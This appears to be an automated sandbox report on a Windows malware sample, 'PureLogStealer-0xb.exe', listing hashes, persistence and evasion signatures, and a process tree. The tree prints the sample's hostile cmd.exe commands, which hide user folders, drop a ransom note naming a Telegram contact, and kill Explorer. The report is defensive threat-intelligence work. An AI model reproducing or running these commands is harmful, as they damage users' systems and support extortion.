Overview

overview

10

Static

static

3

PureLogSte...xb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 01:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PureLogStealer-0xb.exe

  • Size

    193KB

  • MD5

    98609581725d9cf7f5200dbb02266cd6

  • SHA1

    5f8a127fb69172947c6212b3a466279794b702a4

  • SHA256

    01b57b7ab116a353b5d7d778b62c1a99f7f9f10e6af3a524aa13b9e3a588d751

  • SHA512

    1cfa89386dd206ba5be5a981f4942deb76b71f7dcc5a09f9cf605e87a0128983bce1a8d22300e08e0751321a47c6252575d93fa9d81e847944b2c9fc5aaa2d0d

  • SSDEEP

    6144:pS4OgfnRtcCUsnzUCpM69/KImQi/6ebl:srg/jcy

Score
10/10
defense_evasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
    defense_evasion
  • Kills process with taskkill 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
    "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2444
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5952
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5928
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:1916
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2092
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2772
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:4952
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2340
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5128
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5112
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2796
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5684
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" -startup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe -startup
      2⤵
        PID:2380
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3564
      • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
        C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
        2⤵
          PID:4768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --init
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
          C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --init
          2⤵
            PID:4536
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" /setup
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:3124
          • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
            C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe /setup
            2⤵
              PID:4772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --wininit
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:5828
            • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
              C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --wininit
              2⤵
                PID:4800
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c AWindowsService.exe
              1⤵
                PID:5932
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskhost.exe
                1⤵
                  PID:1752
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c System.exe
                  1⤵
                    PID:2776
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c windowsx-c.exe
                    1⤵
                      PID:3788
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c _default64.exe
                      1⤵
                        PID:4696
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c native.exe
                        1⤵
                          PID:4416
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c crypt0rsx.exe
                          1⤵
                            PID:4420
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ux-cryptor.exe
                            1⤵
                              PID:4428

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PureLogStealer-0xb.exe.log
                              Filesize

                              1KB

                              MD5

                              2d2a235f1b0f4b608c5910673735494b

                              SHA1

                              23a63f6529bfdf917886ab8347092238db0423a0

                              SHA256

                              c897436c82fda9abf08b29fe05c42f4e59900116bbaf8bfd5b85ef3c97ab7884

                              SHA512

                              10684245497f1a115142d49b85000075eb36f360b59a0501e2f352c9f1d767c447c6c44c53a3fb3699402a15a8017bdbd2edd72d8599fdd4772e9e7cb67f3086

                              Download Submit

                            • C:\Users\Admin\Downloads\info-Locker.txt
                              Filesize

                              101B

                              MD5

                              1a2b4698b0e96ae9366d34402fbdb9b4

                              SHA1

                              7b7812f974e740b06b00d6aef2c99992ff4ce927

                              SHA256

                              e0ec26166649bc5126d55bb72939d3e2f12a59b6061c02f8c22085e5628f892c

                              SHA512

                              4acc058962dfcc85d27581c4b425a721406551ef83468c6186a70f77802bba76a3c52f1d91028b022098abc9ef824474215b9ed408fc47a6d32724218e0fdad1

                              Download Submit

                            • memory/756-0-0x00007FFCA2533000-0x00007FFCA2535000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/756-1-0x00000000004D0000-0x0000000000506000-memory.dmp

                              Filesize

                              216KB

                              Download

                            • memory/756-2-0x00007FFCA2530000-0x00007FFCA2FF1000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/756-20-0x00007FFCA2533000-0x00007FFCA2535000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/756-21-0x00007FFCA2530000-0x00007FFCA2FF1000-memory.dmp

                              Filesize

                              10.8MB

                              Download